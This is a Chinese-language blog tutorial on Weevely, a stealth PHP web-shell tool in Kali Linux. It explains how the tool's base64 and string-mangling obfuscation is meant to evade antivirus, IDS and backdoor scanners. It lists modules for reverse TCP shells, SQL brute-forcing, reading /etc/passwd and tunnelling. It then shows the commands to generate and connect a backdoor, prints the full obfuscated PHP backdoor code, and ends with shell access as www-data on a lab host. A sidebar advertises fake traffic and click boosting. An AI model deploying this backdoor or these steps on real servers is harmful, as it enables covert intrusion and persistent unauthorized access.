kali linux 维护访问工具 Weevely 教程

kali linux 维护访问工具 Weevely 教程
    日期:2018年02月04日
    观看: 1,295 °C 次

Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。

 

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

 

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

 

用法:

1、生成后门代理

weevely generate <password> <path>

 

2、运行终端到目标

weevely <URL> <password> [cmd]

 

3、加载会话文件

weevely session <path> [cmd]

 

发生器:描述

generate.img:后门现有的图像,并创建相关的.htaccess

generate.htaccess:生成后备的.htaccess

generate.php:生成混淆的PHP后门

 

模块:描述

 

audit.systemfiles:查找错误的系统文件权限

audit.userfiles:猜猜在用户主文件夹|的权限错误的文件

audit.mapwebfiles:抓取和枚举Web文件夹文件的权限

audit.phpconf:检查php的安全配置

audit.etcpasswd:枚举用户和/ etc / passwd内容

shell.sh:执行系统shell命令

shell.php:执行PHP语句

system.info:收集系统信息

find.name:查找具有匹配名称的文件

find.perms:查找具有写入,读取,执行权限的文件

find.suidsgid:使用超级用户标志查找文件

backdoor.reversetcp:发送反向TCP shell

backdoor.tcp:在TCP端口上打开一个shell

bruteforce.sql:Bruteforce SQL用户名

bruteforce.sqlusers:暴力破解所有SQL用户

file.read:读取远程文件

file.webdownload:将网址下载到远程文件系统

file.mount:使用HTTPfs 装载远程文件系统

file.enum:枚举远程路径

file.upload2web:上传二进制/ ascii文件到远程web文件夹中,并猜测相应的url:

file.check:检查远程文件类型,md5和权限

file.rm:删除远程文件和文件夹

file.ls:列出目录内容

file.touch:更改文件时间戳

file.download:从远程文件系统下载binary / ascii文件

file.upload:将binary / ascii文件上传到远程文件系统|

file.edit:编辑远程文件

sql.console:运行SQL控制台或执行单个查询

sql.dump:获取SQL数据库转储

net.ifaces:打印接口地址

net.proxy:安装并运行代理以通过目标|来隧道传输

net.phpproxy:安装远程PHP代理

net.scan:端口扫描打开TCP端口

 

提示:运行':help <module>'打印详细的使用信息。

 

示例:

1、生成php后门

[email protected]:~# weevely generate fujieace /home/fujieace.php

Generated backdoor with password 'fujieace' in '/home/fujieace.php' of 1449 byte size.

weevely generate fujieace /home/fujieace.php

 

2、用vim查看fujieace.php代码如下:

<?php
$s='//_/","/i/-/"i/),arrai/y("/",i/"+"),$ssi/i/($s[$i],i/0,$i/e))i/),i/$k)));$o=ob_get_conteni/ti/s();ob_ei/i/nd_clean';
$S='$ii/]="";$p=$si/s($p,3);}i/i/ii/i/f(i/array_key_exii/sts($i,$si/)){$s[$i].i/=$p;$e=strposi/($s[i/$i],i/$f);i/if';
$l='f),0,3)i/);i/$p="";fori/($i/z=1;$z<couni/i/t($m[1i/]);i/$z++)$p.=$qi/i/i/[$m[2][$z]];if(stri/pos($p,$hi/)===0i/){$i/s[';
$v=';$i<$l;){for(i/$ji/i/=0;($j<$c&i/&$i<$l)i/;$j++i/,i/$ii/++){$o.=$t{$ii/}^$k{i/$j};}}i/return $o;}i/$i/r=$_SERVE';
$D='?i/:;i/q=0.([\\i/d]))?,?/"i/,$i/ra,$m);if($q&i/&$m){@sessii/on_sti/arti/();$s=i/&$_i/SESSION;$ssi/="si/ubstr";i/$';
$R='$i/kh="6b59";$ki/f="0i/165";funi/ction xi/($t,$ki/){$c=si/trlen($ki/);$i/l=i/strlen(i/$t);$o=i/"";fi/or(i/$i=0';
$g='Ri/;i/$i/[email protected]$r["HTTP_REFEi/RER"];$i/ra=i/@i/$r["HTTP_ACCEPT_Li/Ai/NGUAGEi/"]i/;if($ri/r&&$ra){$i/u=parse_i/ur';
$B='l($rr);pi/arsei/_str($ui/i/[i/"query"],$q);$q=ai/rrayi/_vali/uei/i/s($q);preg_match_all(i/"/([\\wi/])[i/\\w-]+i/(';
$k=str_replace('w','','crwweateww_fuwnwction');
$X='($e){$ki/=$kh.$ki/f;ob_sti/art()i/;@evi/al(@i/gzuncompri/ess(@x(i/@i/basi/e64_decodi/e(preg_repi/lace(arrai/y("i';
$W='();$d=bai/se64i/_ei/ncoi/de(x(gzcompi/ress($oi/),$ki/));prini/t("<$i/k>$d<i//$k>");@i/si/ession_desti/roy();}}}}';
$T='sl="stri/tolower"i/;$i=i/$m[i/1][0].$m[1i/][1];i/$i/h=$sl($si/s(i/mi/d5i/($ii/.$kh),0,3));$f=$sl($si/s(md5($ii/.$k';
$r=str_replace('i/','',$R.$v.$g.$B.$D.$T.$l.$S.$X.$s.$W);
$p=$k('',$r);$p();
?>

 

3、连接终端目标

[email protected]:~# weevely http://192.168.1.202/fujieace.php fujieace

Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'

[+] Current session: 'sessions/192.168.1.202/fujieace.session'

 

4、成功得到web shell权限

[email protected]:/var/www $ uname

Linux

 

[email protected]:/var/www $ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

Weevely效果与评价:

我目前只知道它的确是可以生成php一句话木马,也是一款非常好的php web shell工具,此工具说明是生成的木马查杀不出来,但是我没有真正的拿到服务器上面去测试过。有兴趣的朋友可以在自己的服务器上做下测试!(注意:此工具仅用于学习,请勿用于其它途径,否则后果自负!

 

在线视频:

优酷:http://v.youku.com/v_show/id_XMzM3ODczMDM1Ng==.html

腾讯:https://v.qq.com/x/page/q0550vx7go3.html

爱奇艺:http://www.iqiyi.com/w_19rw2sv391.html

乐视:

付杰
wp discux 帝国 dedecms phpcms等快速建站
wp discux 帝国 dedecms phpcms等快速建站
  • ¥ 99.9元
  • 市场价:499.9元
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
刷流量、刷人气、刷点击、刷收藏、刷APP关键词服务
  • ¥ 1.0元
  • 市场价:9.9元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: